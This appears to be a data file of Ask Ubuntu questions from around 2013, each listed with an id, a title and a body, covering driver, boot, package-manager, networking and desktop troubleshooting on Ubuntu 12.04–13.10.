347880	ubuntu 12.04.3 nvidia standard/recovery boot	os : ubuntu 12.04.3 gpu : nvidia gtx 560ti here is the thing . i installed additional drivers ( latest version ) for my gpu , and since then ubuntu won`t boot ( standard boot ) , it boots to black screen . but when i go to recovery mode boot , it boots properly , and shows that my new drivers are in use , and it works fine whatsoever . why is it working only in recovery boot ? p.s . i added nomodeset to boot options .
347883	can i change the shortcut to change the keyboard layout to shift + alt ?	whenever i try to change it to shift + alt the shortcut gets disabled ... never mind , it is already reported as a bug at lunchpad : https : //bugs.launchpad.net/ubuntu/+source/indicator-keyboard/+bug/1218322
347884	unable to install ubuntu 12.04 on sas hot swap hard disk drive ( 2*146 gb , 15 rpm ) with raid 1	unable to install ubuntu 12.04 server on below mentioned hardware with raid 1 . without raid one harddisk is detacting . with raid 1 harddisk is not detecting . hardware details : - intel xeon e5410 2.33 ghz 12 mb l2 cache motherboard-intel chipset s5000p sas hot swap hard disk drive ( 2*146 gb , 15 rpm )
347886	ubuntu - apt-get not working behind restricted internet access	i have ubuntu 12.04 64-bit boxes running in a company but they have internet browsing and firewalls for security . when i do apt-get update or install it fails . but i have a remote server which ip is only allowed to have access . how can i tell apt-get to go to my cloud server and via the cloud server get the packages downloaded or updated ?
347893	downgrade from ubuntu 13.10 to 12.04	recently upgraded to ubuntu 13.10 , it is really giving me problems i get a blank screen after i have logged on , i can only see a mouse pointer please assist . i would like to rollback/downgrade to my 12.04 version it is quiet stable
347897	kernel panic - not syncing . no ini found . ubuntu 12.04 along side windows 7 dual boot	i was able to boot into ubuntu 13.04 from a live usb and do an installation on my hp ne56r31u which came with windows 8 pre-installed , but which i since got a tech to change to windows 7 instead . however , after a successful installation along side windows , upon reboot , i would get a black screen with a blinking cursor . tried several of the fixes recommended here but none of them worked , and one of them made me unable to get to grub , which made me unable to boot into even windows and i became afraid . i at least want to have one os working on my machine . since it 's been a few days and i am still unable to get ubuntu to work despite begging for answers , i did a re-install , but this time with 12.04 lts . once again the installation completed fine , but upon reboot , nothing . the error message this time is kernel panic - not syncing . no init found . try passing init=option to kernel . i booted in again using the live usb and ran a boot repair . you can find the results here . http : //paste.ubuntu.com/6131996/ there are two things that stood out for me during the boot repair : cryptsetup : warning : failed to detect canonical device of overlayfs cryptsetup : warning : could not determine root device from /etc/fstab and ( glade2script:16608 ) : gtk-warning ** : attempting to store changes into `/root/.local/share/recently-used.xbel ' , but failed : failed to create file '/root/.local/share/recently-used.xbel.mtng3w ' : no such file or directory ( glade2script:16608 ) : gtk-warning ** : attempting to set the permissions of `/root/.local/share/recently-used.xbel ' , but failed : no such file or directory ubuntu @ ubuntu : ~ $ cat /etc/fstab overlayfs / overlayfs rw 0 0 tmpfs /tmp tmpfs nosuid , nodev 0 0 /dev/sda5 swap swap defaults 0 0 ubuntu @ ubuntu : ~ $ can someone please help me ? it 's been weeks !
347898	what 's difference of apt-get and aptitude ?	what is difference of apt-get and aptitude ? does both of them use same repositories ? which one is better ?
347899	how to locate a sub-direcotry ?	i want to locate a sub-directory build/debug within a folder are there any shell command that can do this ?
347900	can not make mobile broadband connection in ubuntu 13.04	i have ubuntu 13.04 and i bought yesterday a vodafone usb stick for internet connection . i am located in romania . this is what i 've did : first thing network connections , added connection . selected mobile broadband selected my country , and network ( vodafone ) selected mobile internet ( postpaid ) i 've called the guy who gave me the stick , and he told me it 's postpaid ( anyway , i 've tried also prepaid , not working ) . just got to general , and checked automatically connect to this network when it is available , and saved . nothing happend . second thing i 've installed wvdial , set up the configuration to phone = *99 # username = internet.vodafone.ro password = vodafone new pppd = yes stupid mode = 1 when i run sudo wvdial i get this -- > wvdial : internet dialer version 1.61 -- > can not open /dev/modem : no such file or directory -- > can not open /dev/modem : no such file or directory -- > can not open /dev/modem : no such file or directory i do n't have any /dev/modem file or folder , and also no file starting with the name ttyusb . third thing i 've took out of the usb port the stick , and run ls -1 /dev > before.txt . plugged in the stick , and runned again . the diff before.txt after.txt got me this : 9a10 > cdrom2 82a84 > sg2 86a89 > sr1 fourth thing if i run lsusb i get this bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 007 : id 12d1:1f17 huawei technologies co. , ltd . bus 001 device 004 : id 0a5c:21bc broadcom corp. bcm2070 bluetooth 2.1 + edr bus 001 device 005 : id 064e:8123 suyin corp . this one ( i guess ) is the usb stick bus 001 device 007 : id 12d1:1f17 huawei technologies co. , ltd. any suggestions ? the usb works fine on windows . i 've tried to install it 's own software ( windows application ) with wine , but also got an error . update : i 've found a command that tells me which /dev/* is my vodafone stick . sudo lsblk sr1 11:1 1 128m 0 rom /media/icebox/vodafone mobile broadband i 've changed my wvdial configuration file , and added : modem = /dev/sr1 now , if i run sudo wvdial i get : -- > wvdial : internet dialer version 1.61 -- > can not open /dev/sr1 : invalid argument -- > can not open /dev/sr1 : invalid argument -- > can not open /dev/sr1 : invalid argument
347908	how to get sed to substitute for all but one character	i have a statement of the form atphysaddress [ 1 ] [ 1.10.0.0.98 ] i would like to remove all details except for the first one in the second bracket , or whichever value falls there , how can i achieve this ? ( i.e i would like to only leave out the first integer in the second bracket )
347911	array microphone is not recognised as an external line-in microphone	i recently purchased an array microphone from acoustic magic for some video conferencing needs . while other usb based external microphones seem to work out of the box on ubuntu 12.04 , this one ( which connects to the laptop via the audio port and gets external power through a power adapter ) does not . the same mic works fine on windows 7 and on an imac - i tested them out in my office . does anyone know how to connect a line-in external mic to ubuntu ? thanks
347913	why apt-get does n't download from local repository ?	i have created a local repository using following command and places in /usr/local/myrepository : dpkg-scanpackages . /dev/null | gzip -9c > packages.gz packages.gz was successfully created . then i added my local repository address to source.list and remove other repositories except one . so my source.list contains two lines bellow : deb file : /usr/local/myrepository ./ deb http : //ir.archive.ubuntu.com/ubuntu/ precise main restricted then i ran apt-get update and it was ran successfully . after running apt-get install libpcap-dev , apt-get downloads it from second repository instead of my local repository ! why this occurs ? how to fix it ? ( certainly my local repository contains appropriate .deb packages )
347914	use bluetooth headset as presenter	i have a bluetooth headset hs3000 . is it possible to use forward/backward keys on the headset for going forward and backward in the presentation , e.g. , in evince ?
347917	run unity and gnome3 alongside ?	is it possible to have unity and gnome3 installed at the same time , and then be able to switch between them ? i currently running ubuntu 13.04 with unity , and really want to try the gnome3 desktop , but i still wa n't to be able to use unity if i do n't like it .
347918	does the fn lock ( fnlk ) on thinkpad t440s work well with linux ?	i 'm considering to buy a lenovo thinkpad t440s and to install linux on it . according to the user guide and photos of t440s , to use f1-f12 you have to hold down the fn key , or use fn+esc to enable `` fn lock '' ( fnlk ) . can anybody who has a t440s tell me whether fnlk works with linux ? or does it rely on some windows only driver ? thanks .
347921	laptop shuts down due to overheating during ubuntu installation	i have an hp pavilion g6 laptop and it came pre-installed with windows 8 . i 'm trying to dual boot ubuntu . i 've disabled secure boot and tried to install both ubuntu 12.10 and 13.04 . during both installations my laptop shut down and later when i started it again it warned about an overheating problem . even during the installation the laptop fan blew at a very high speed . amd a4 , 4 gb ram , 1gb ati radeon 7420g,500gb
347922	error while installing 8 kingdoms	dpkg : error processing /home/sony/downloads/8kingdoms-1.1.0.deb ( -- install ) : parsing file '/var/lib/dpkg/tmp.ci/control ' near line 12 package '8kingdoms ' : blank line in value of field 'description' this is the error that i have encountered while installing 8 kingdoms . what should i do ?
347923	using firefox 's 3d view , how do i scroll down the page ?	i 'd like to scroll down while using firefox 's 3d view to inspect web pages . i want to see a flat view of the footer like shown here for the top of the page : the best i can do is to scroll way out , then rotate the page . that gives me this view of the footer , which is at too extreme an angle to be useful : scrolling to the bottom of the page first , then triggering 3d view makes no difference . i am still presented with the top of the page . how do i scroll down the page while keeping it flat like the top image ?
347925	run galfit in terminal	i 'm trying to run a program called galfit . i want to be able to just type galfit in the terminal and for it to run ( then add switches and commands etc like galfit < input file > ) i 've tried putting the program in /usr/local/bin/ and /opt/ , but this does n't work . i do n't know how to make it respond to the command galfit ! it seems like it should be so simple . i 've followed this guide to do something similar with sublime text 2 and it worked . so , why not for galfit ?
347929	how can i check if my video card is installed properly ?	i am using lubuntu and my video card is geforce fx 5200 . i have installed some drivers from the software center and they installed successfully , but the pc is still very slow and when moving windows for example , i see some artifacts , which makes me think the video card is not properly installed . also there is a huge lag with online videos . i understand my pc is old but i ca n't stand the fact i ca n't watch a video online . how can i verify if video card is installed and working properly with lubuntu ?
347930	install ubuntu alongside windows 7 on an ssd	first of all , i want you to know that this is a machine translation because i do not speak english . so i apologize for any errors that may see . i want to make an installation of ubuntu alongside windows 7 on a 128gb ssd . also i have a 500gb hdd . my intention is to minimize writes to the ssd , so i think it 's a good idea to setup a gpt partition table and locate the most critical partitions in regards to writes to the hdd . however , i want the / home remains on the hdd for the system to read as fast as possible the configuration files . i think the system will be more efficient as well . i would like to help me calculate the size of the partitions and decide which of them should be created on the hdd and the ssd which ( besides the root partition and home partition ) . on the hardware side , my team is as follows : motherboard : gigabyte z68ap-d3 processor : intel core i5 2500 ( 4 cores at 3.300ghz ) ram : 8gb ddr3 1.600mhz graphics : nvidia geforce gts450 1gb thank you for your help .
347931	how to install broadcom 4313 driver ?	i try all methods in the ask ubuntu but it did n't work . lspci -nn | grep wireless output : 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) lshw -c network output : *-network unclaimed açıklama : network controller ürün : bcm4313 802.11bgn wireless network adapter üretici : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 sürüm : 01 genişlik : 64 bits saat : 33mhz kapasiteler : bus_master cap_list yapılandırma : latency=0 kaynaklar : bellek : c2500000-c2503fff *-network açıklama : eternet interface ürün : rtl8101e/rtl8102e pci express fast ethernet controller üretici : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 mantıksal ad : eth0 sürüm : 05 serial : 2c:27 : d7 : d9:94:7b boyut : 100mbit/s kapasite : 100mbit/s genişlik : 64 bits saat : 33mhz kapasiteler : bus_master cap_list eternet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation yapılandırma : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=192.168.1.63 latency=0 link=yes multicast=yes port=mii speed=100mbit/s kaynaklar : irq:41 ioport:3000 ( boyut=256 ) bellek : c0404000-c0404fff bellek : c0400000-c0403fff warning : output may be incomplete or inaccurate , you should run this program as super-user .
347932	i ca n't use apt-get -f install	i am using ubuntu 12.04 and i need to install some tools ( i am root ) . when using apt-get ... etc . i kept getting the advice from ubuntu to first to apt-get install . wich did n't work , and led me to trying apt-get -f install . wich did n't work either and starts giving this error : pkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-53-generic /boot/vmlinuz-3.2.0-53-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-53-generic /boot/vmlinuz-3.2.0-53-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.2.0-53-generic_3.2.0-53.81_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) can anyone help me ?
347934	bonding of bond interface in ubuntu 13.04	is it possible to bonding of bond interface ? i have two nic bonded as bond0 ( balance mode ) and two other nic bonded as bond1 ( balance mode ) . i want to create bond2 ( active back-up mode ) by using bond0 and bond1 . i am using ubunntu 13.04 . thanks .
347937	generate alert on high cpu usage	after seeing a question here i want to have a configuration in my ubuntu system so that if the cpu processing exceeds 90 % , it gives a beep sound . is this possible ? also , where else can this beep sound be used ? can it be used if the hard disk utilisation exceeds 80 % ?
347938	problem with installing ubuntu 12.04 lts while having windows 7 already on laptop	i already have windows 7 on my laptop , and i want to install ubuntu 12.04 lts on that too.when i am installing ubuntu its asking for restore full hard drive . how do i install both ?
347945	problem when i apt get update `` precise/main armhf packages 404 not found ''	i try a restore my sorce list , change my server updates to main . but i still have the same problem . it all started when i try to instal the nvidia cuda toolkit . i fallow the guide to install the cuda toolkit i paste this code on terminal : $ echo `` foreign-architecture armhf '' > > /etc/dpkg/dpkg.cfg.d/multiarch $ sudo apt-get update then the errors began to occur here is my link of that have the terminal errors
347946	how to raise user notifications in ubuntu using java code ?	how to raise user notifications in ubuntu using java code ?
347950	i want the firefox icon on the launcher to open a new window if there is no firefox window open on the current workspace	i 'm using ubuntu raring ringtail , with three monitors and four workspaces . currently , if i click on the firefox button on the launcher and firefox is already running but there is no firefox window on the current workspace , it switches to a workspace which already has an open firefox window . i do n't want it to do that . when i click the button it should open a new firefox window on the current workspace , if there is n't already one . is it possible to configure the launcher to work that way ?
347951	upgrade gnome-shell in ubuntu12.04	i have gnome-shell version 3.4 installed in my ubuntu 12.04 . i want to upgrade it to the latest and stable version of gnome-shell ( i mean a version after 3.4 ) . what should i do to update it ?
347952	non-persistant user sessions with hard disk	live cd/usb users often ask how they can have persistent changes but i 'm after the reverse - i am building a minimal thin client using a hard disk and want it to act live a live cd , where all changes are lost . i also need admins to be able to make persistent changes . can i achieve this ? all i have is minimal install , x-windows , firefox and citrix receiver . it wo n't help to point out that there is n't much for a user to change , nor to suggest using an actual live cd , this has to be a hard-disk install . i 'm thinking that redirecting all changes to a ram disk would be ideal but i have no idea how to do this and would welcome some expert advice . thanks in advance .
347957	how to enable backlit keyboard on a dell latitude m4500 ?	basically the question in in the title : how can i enable the backlight keyboard on a dell latitude m4500 ?
347960	chat window does n't open when someone starts a chat	i 've this annoying problem : when someone starts a skype chat with me , it does n't open a window in front of me . it just puts a little triangle in the skype launcher - so most of the time i do n't notice that people want to chat with me . i would like a chat window to pop up as soon as someone starts a chat with me . in the skype settings , i activated 'open chat window in front of me ' to no avail . i suspect that it has to do with ubuntu windows behaviour , as i also have this problem sometimes with other programs ( eg if i click on a pdf file , it doesnt open acrobat . it just activates the program in the launchbar & i 've to click on it to see it . ) i 've tried fiddling with compiz setting , ubuntu tweak , etc. , but nothing works . anyone can help with this ? thanks i 'm on ubuntu 13.04 . i did n't have this problem with earlier versions
347961	info documentation may be missing	i just started learning linux . i 'm trying to read through all the documentation contained in the info files . i first noticed them on a mac ( running mountain lion ) when i typed the `` info info '' command . it brought up a handy tutorial on how to navigate through the nodes . i do n't want to waste company time while reading these docs on my work machine , so i tried to find the same tutorial on my ubuntu machine at home ( running 13.04 ) . i typed `` info info '' again , but the output seems different . one of the available options was to hit `` h '' for a beginner 's tutorial . i thought this was the same thing , but when i hit `` h '' , it says there is no file or directory with that name . typing `` h '' just brings up a short list of commands , not the in-depth file i was looking for . what am i missing ?
347963	will installing ubuntu convert my hard disk to a dynamic disk ?	i have 3 partitions in windows 8 , and i want to install ubuntu , and i know ubuntu will need at least 2 partitions , so in total it will be 5 partitions in the hard disk , so will this convert my hard disk to a to dynamic disk ?
347967	mythtv can not connect to database	i 'm new to ubuntu , just installed mythbuntu 12.04.3 ( 64-bit ) from an iso ( single fontend/backend combo ) . seemed to instal fine , rebooted my machine only to find i was faced with a screen asking for country and language information ( fine ; uk , english ) . however , the next screen says 'mythtv can not connect to database ' and i am presented with a form ( one of two ) , which already contains data ( hostname , password ... ) so change nothing . i click next ( to get to screen two of two ) again change nothing ( both check boxes are left unticked ) and click finish . this sends me back to the original country/language screen . is there a fault with the install ? have i missed something in the install/instructions ? is there a way of fixing this ? appreciate your answers .
347973	how to install xubuntu 13.04 inside windows 7	i downloaded iso image for xubuntu amd64 but there is no wubi.exe in the package , is there is any way to install xubuntu inside windows 7 ? your help is appreciated !
347975	dropbox crashes nautilus 9 - refusing to add [ ... ] 'nautilusdropbox : :browse '	i use ubuntu 13.04 64. the two similar posts did not help me ( nautilus crashing because of dropbox ( ubuntu 13.04 ) and dropbox crashes nautilus ) i think my problem is different as i get a different error message . i open my terminal , execute nautilus , a single click on dropbox folder crashes nautilus , here is the log . nautilus initializing nautilus-dropbox 1.6.0 ( nautilus:4301 ) : gtk-warning ** : refusing to add non-unique action 'nautilusdropbox : :browse ' to action group 'dirextensionsmenugroup' segmentation fault nautilus the same thing happens with marlin : the log says : [ warn 10:22:45.484818 ] [ gtk ] inserting action group 'dirviewactions ' into ui manager which already has a group with this name segmentation fault can someone help me fix the problem ?
347976	does an upgrade from 12.10 to 13.04 will effect the version of php/other packages installed ?	my work laptop is running ubuntu 12.10 ( 32-bit ) . due to the need to be able to test our code in the same versions of php , memcache , and a few other modules ; i need to keep the php version right where they are at ( for example php 5.3.x ) . however i would like to upgrade to my current os version to ubuntu 13.04 . can i upgrade without worrying that ubuntu will also upgrade the php package and other related packages ? or will it just do that whether i like it or not ? thanks ! edit : after running `` sudo apt-get dist-upgrade -v '' i get the following results : the following packages will be removed : libmemcached6 ( 0.44-1.1build1 ) php5-intl ( 5.4.6-1ubuntu1.4 ) php5-memcached ( 2.0.1-6 ) php5-xsl ( 5.4.6-1ubuntu1.4 ) the following new packages will be installed : libjs-underscore ( 1.3.3-1ubuntu1 ) libmemcached10 ( 1.0.8-1 ) libmemcachedutil2 ( 1.0.8-1 ) linux-headers-3.5.0-40 ( 3.5.0-40.62 ) linux-headers-3.5.0-40-generic ( 3.5.0-40.62 ) linux-image-3.5.0-40-generic ( 3.5.0-40.62 ) linux-image-extra-3.5.0-40-generic ( 3.5.0-40.62 ) the following packages have been kept back : php-apc ( 3.1.7-1 = > 3.1.13-1 ) the following packages will be upgraded : libmemcached-tools ( 0.44-1.1build1 = > 1.0.8-1 ) linux-headers-generic ( 3.5.0.31.47 = > 3.5.0.40.56 ) linux-image-generic ( 3.5.0.31.47 = > 3.5.0.40.56 ) mercurial ( 2.6.1-1ppa1~quantal1 = > 2.7-0ppa1~quantal1 ) mercurial-common ( 2.6.1-1ppa1~quantal1 = > 2.7-0ppa1~quantal1 ) tortoisehg ( 2.8-0ppa1~quantal1 = > 2.9-0ppa1~quantal1 ) the following packages will be downgraded : libapache2-mod-php5 ( 5.3.10-1ubuntu3.6 = > 5.3.10-1ubuntu3 ) php5-cli ( 5.3.10-1ubuntu3.6 = > 5.3.10-1ubuntu3 ) php5-common ( 5.3.10-1ubuntu3.6 = > 5.3.10-1ubuntu3 ) php5-curl ( 5.3.10-1ubuntu3.6 = > 5.3.10-1ubuntu3 ) php5-gd ( 5.3.10-1ubuntu3.6 = > 5.3.10-1ubuntu3 ) php5-mysql ( 5.3.10-1ubuntu3.6 = > 5.3.10-1ubuntu3 ) php5-sqlite ( 5.3.10-1ubuntu3.6 = > 5.3.10-1ubuntu3 ) php5-sybase ( 5.3.10-1ubuntu3.6 = > 5.3.10-1ubuntu3 ) so it looks like i would be fine .
347977	desktop icons specific to a certain workspace ?	i want certain to appear on certain workplace , for example : i want the document.pdf to be on workspace 1 but not on the other workspaces ( 2,3,4 , ... ) or on workspace 2 and not on the other workspaces ( 1,3,4 , ... ) . using ubuntu 12.04
347978	how the installer can find my preseed.cfg file ?	am following the ubuntu help ( automating the installation using preseeding ) and created the preseed.cfg file . am trying to install `` ubuntu 12.04 lts '' using usb so kept the preseed.cfg file in top level directory of the pen drive . when i start trying with bootable usb , i have given preseed/file=/hd-media/preseed.cfg as a bootable parameter by pressing e after highlight the kernel but manual installation is only happening . i believe installer is not finding my preseed.cfg file . can you please guide me that how the installer can find my preseed.cfg file ? regards senthil
347981	shortcut to switch between different keyboard layouts ( languages ) ?	is there a shortcut for this , or can i create one ? i 'm running 12.04 .
347983	is ubuntu compatible with my laptop	does ubuntu work on laptops , and if so , which download do i choose ?
347985	grub power down if idle	so , i have reign over 200 pcs at my work place , which are all dual boot win 7 and ubuntu . we want to encourage usage of both oses , so there is no timeout to the grub screen . grub will remain on screen until an os is picked and it will function as normal . the consequence of this however , is that the machines regularly get left on for a very long time . is there a way to run a script within grub itself , to shutdown the machine if it 's been idle for x minutes ? this would have huge power saving for us . for reference , the machines are running ubuntu 12.04 lts , grub version `` 1.99-21ubuntu3.10 '' . i was n't sure whether this belonged in superuser or here , but because it 's grub focused i popped it here . feel free to move it .
347986	windows 7 install failed	i have ubuntu 12.04 lts , and i want to install windows 7 ( i have no interest in keeping ubuntu on the computer ) . i have a windows 7 installation dvd , but when i tell my computer to boot from the cd/dvd drive in the bios , it does n't work . it bypasses it and starts booting ubuntu instead . i have used this windows installation disk in the past , so i know that it works .
347998	how do i activate the wireless driver on ubuntu 12.04	i recently installed ubuntu 12.04 and , while at first i had wireless connection , now i do n't . when i try to activate the wireless driver through the additional drivers a message pops up that says that the installation failed and i should look at the log file for details : /var/log/jockey.log . what should i do ?
348002	no sound devices using evga 210 ( nvidia geforce 210 chipset )	i 've disabled the onboard sound on my intel dg41rq motherboard , and installed a evga 210 pci-e video card with hdmi audio output . after that , no sound devices are shown in the sound config , and of course , i have no sound at all using ubuntu 12.04 64-bit works fine under win7 x64
348005	why does nvidia-settings crash when i close it ?	whenever i click close , the window darkens , takes a few seconds to disappear , and then prompts a `` close or relaunch ? '' box . it happens every time i open it , too . is this something ubuntu developers have to fix , something nvidia has to fix , or something i could fix on my own ?
348006	thunderbird suddenly opens pdf attachments with imagemagick	i am running ubuntu 12.04 and use thunderbird as my email client . people send me pdf-files all the time , and clicking on them used to open them in acroread . since a few days , if i click on an attachment , it opens them with imagemagick ! i have no idea how this happened , i did not mess with pdf settings recently and i did not even know i had imagemagick installed . i checked under edit- > preferences- > attachments , where is says 'use adobe reader 9 ( default ) ` . when right-clicking on a pdf file in nautilus and doing properties- > open with , it again lists 'adobe reader ' as default and only 'document viewer ' as an alternative option . i also can not find imagemagick anywhere in mimetypes.rdf . anybody knows what is going on or what to investigate further ?
348012	battery problem	ubuntu 's unity eats up my asus eee pc 's battery , in a few minutes , with libreoffice running . should i reduce the memory usage of libreoffice , or get a spare desktop environment ?
348016	12.04 dual boot w/ windows 8 hangs at purple screen . black screen in recovery . please help !	i recently installed 12.04 alongside windows 8 on my asus laptop . i ran boot repair after the install in order for grub to show up and let me have a choice between windows and ubuntu . however , upon choosing ubuntu the system hangs at a purple screen and the recovery mode goes to black . i have integrated graphics ( intel hd 4000 ) . please let me know what information i need to provide/ how to get that information . i 've been through multiple posts on this issue but the solutions didnt seem applicable since i dont have access to a terminal . any help would be very appreciated . attempts at fixing this : editing the kernel by removing quiet splash , replacing with nomodeset , no splash , and all other similar suggestions . result : no effect . no dump of information on the screen . additionally , cntrl + x would not work . had to f10 out of the editor . should i reinstall ? installing it through my flash drive ( the current installation ) alongside windows 8 was very sketchy . i had to make three partitions one for the ext4 file system , one for swap , and one for a reserved boot space .
348019	unable to boot into ubuntu 13.04	my pc has ubuntu 13.04 alongside window 8 . last time i used my pc ( in ubuntu ) is 5 days ago and it was fine . today i tried to boot into ubuntu but failed . normal boot seems to stuck forever at the purple ubuntu screen with nothing on it . i also tried to select recovery mode in grub screen . what happened is the screen ( command line ) was flooded by this line udevd [ 360 ] : timeout : killing '/sbin/modprobe -bv pci : v000010ded00000dc4sv000010desd0000085abc03sc00i00 ' [ 339 ] i also tried to run boot-repair in live-usb . nothings worked . this is the paste log from the boot-repair . > > http : //paste.ubuntu.com/6133079/ window 8 is still working . any help is very appreciated . also this is my first time posting on this i dunno what i need to tell .
348020	updatemanager error	i have this icon in my desktop ( sorry , i am not allowed to post images ) and here i transcribe the information about the error in update manager . e : encountered a package with no header e : problem with mergelist /var/lib/apt/lists es.archive.ubuntu.com_ubuntu_dists_precise_main_i18n_translation-en e : package lists or status file could not be parsed or opened . how can i solve this issue ? should i do something or take it easy until it gets fixed by itself ? thank you
348025	when i update i get these errors ? how to get rid of these ?	w : gpg error : http : //archive.ubuntu.com precise release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //archive.ubuntu.com precise-proposed release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > e : could not open file /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_restricted_source_sources.indexdiff - open ( 2 : no such file or directory )
348026	ubuntu how set php+apache best performance for neo4j	ubuntu i want to config apache2 for max performance to client of neo4j . memory 15.8gb cpu inter xeon 2.53 x 8
348028	is there an efficient way to set all lines with amixer ?	on my hardware platform i have a lot of lines . is there a way to set the volume of all of these ? or mute all of these ? if not , is there a way i can for loop this ? if i change hardware platforms , is there a way i can get amixer to output a list of lines so that i can write a hardware agnostic volume controller ? see all my lines : simple mixer control 'pcm',0 simple mixer control 'line',0 simple mixer control 'line dac',0 simple mixer control 'line line2 bypass',0 simple mixer control 'line pga bypass',0 simple mixer control 'mono',0 simple mixer control 'mono dac',0 simple mixer control 'mono line2 bypass',0 simple mixer control 'mono mixer dacl1',0 simple mixer control 'mono mixer dacr1',0 simple mixer control 'mono mixer line2l bypass',0 simple mixer control 'mono mixer line2r bypass',0 simple mixer control 'mono mixer pgal bypass',0 simple mixer control 'mono mixer pgar bypass',0 simple mixer control 'mono pga bypass',0 simple mixer control 'adc hpf cut-off',0 simple mixer control 'agc',0 simple mixer control 'hp',0 simple mixer control 'hp dac',0 simple mixer control 'hp line2 bypass',0 simple mixer control 'hp pga bypass',0 simple mixer control 'hpcom',0 simple mixer control 'hpcom dac',0 simple mixer control 'hpcom line2 bypass',0 simple mixer control 'hpcom pga bypass',0 simple mixer control 'left dac mux',0 simple mixer control 'left hp mixer dacl1',0 simple mixer control 'left hp mixer dacr1',0 simple mixer control 'left hp mixer line2l bypass',0 simple mixer control 'left hp mixer line2r bypass',0 simple mixer control 'left hp mixer pgal bypass',0 simple mixer control 'left hp mixer pgar bypass',0 simple mixer control 'left hpcom mixer dacl1',0 simple mixer control 'left hpcom mixer dacr1',0 simple mixer control 'left hpcom mixer line2l bypass',0 simple mixer control 'left hpcom mixer line2r bypass',0 simple mixer control 'left hpcom mixer pgal bypass',0 simple mixer control 'left hpcom mixer pgar bypass',0 simple mixer control 'left hpcom mux',0 simple mixer control 'left line mixer dacl1',0 simple mixer control 'left line mixer dacr1',0 simple mixer control 'left line mixer line2l bypass',0 simple mixer control 'left line mixer line2r bypass',0 simple mixer control 'left line mixer pgal bypass',0 simple mixer control 'left line mixer pgar bypass',0 simple mixer control 'left line2l mux',0 simple mixer control 'left pga mixer line1l',0 simple mixer control 'left pga mixer line1r',0 simple mixer control 'left pga mixer line2l',0 simple mixer control 'left pga mixer mic3l',0 simple mixer control 'left pga mixer mic3r',0 simple mixer control 'pga',0 simple mixer control 'right dac mux',0 simple mixer control 'right hp mixer dacl1',0 simple mixer control 'right hp mixer dacr1',0 simple mixer control 'right hp mixer line2l bypass',0 simple mixer control 'right hp mixer line2r bypass',0 simple mixer control 'right hp mixer pgal bypass',0 simple mixer control 'right hp mixer pgar bypass',0 simple mixer control 'right hpcom mixer dacl1',0 simple mixer control 'right hpcom mixer dacr1',0 simple mixer control 'right hpcom mixer line2l bypass',0 simple mixer control 'right hpcom mixer line2r bypass',0 simple mixer control 'right hpcom mixer pgal bypass',0 simple mixer control 'right hpcom mixer pgar bypass',0 simple mixer control 'right hpcom mux',0 simple mixer control 'right line mixer dacl1',0 simple mixer control 'right line mixer dacr1',0 simple mixer control 'right line mixer line2l bypass',0 simple mixer control 'right line mixer line2r bypass',0 simple mixer control 'right line mixer pgal bypass',0 simple mixer control 'right line mixer pgar bypass',0 simple mixer control 'right line2r mux',0 simple mixer control 'right pga mixer line1l',0 simple mixer control 'right pga mixer line1r',0 simple mixer control 'right pga mixer line2r',0 simple mixer control 'right pga mixer mic3l',0 simple mixer control 'right pga mixer mic3r',0
348029	/boot partition keeps running out of space	i keep getting warnings that my /boot is out of space . i cleared it out once , but it filled right back up . do i even need to clear this out ? is it slowing down my computer ? how do i deal with it ?
348030	can i use my old jasc paint shop pro 9.1 on ubuntu ?	although it is no longer supported , jasc paintshoppro is my all time favorite mainstay graphics program , i would be lost without it . i have tried substitutes , such as gimp , but they just do n't do it for me . can psp run on ubuntu ? or is there a way to make it work ? i have heard there is an application or a plugin or something that allows windows-type apps and programs to run on ubuntu -- called wine ? or some simiar name ? can anyone help answer , because i really do not want to do without my paintshoppro .
348033	ubuntu 12.04.3 with gnome : some shortcuts e.g . [ alt ] + [ f2 ] do not work	the above mentioned shortcut does not work , as well as strg/ctrl+alt+t for terminal . but for example strg/ctrl+alt+l for locking the session runs fine . some do , some not , and i do n't know where to look for this in the system settings .
348034	how can i allow ssh connection from an ip subnet on port 10022 using iptables ?	i need to set up a server with public ip for bandwidth testing , and i already have a script to drop all incoming traffic except for the ports i need . i have changed the ssh port from default ( 22 ) to another one ( let 's call it xxxxx ; sorry for the paranoia but we just got hacked last week ) . so my question is how can i allow a range of ip 's to ssh into the server through that specific port ? the script i mentioned earlier : iptables -f iptables -p input drop iptables -p forward drop iptables -p output drop iptables -a input -i em1 -p tcp -- dport xxxxx -m state -- state new , established -j accept iptables -a output -o em1 -p tcp -- sport xxxxx -m state -- state established -j accept iptables -a output -o em1 -p tcp -- dport xxxxx -m state -- state new , established -j accept iptables -a input -i em1 -p tcp -- sport xxxxx -m state -- state established -j accept so i just need to add the ip range so that i can ssh remotely .
348035	can i format from the installation directly ?	there are a lot of files on my hard drive . there 's a huge partition from the first time i chose to install ubuntu and i was n't sure . windows vista will no longer start and ubuntu has too . i want a fresh start straight from the installation . so can i format and erase everything and remove partitionsfrom the installation and if so how ? thank you in advance
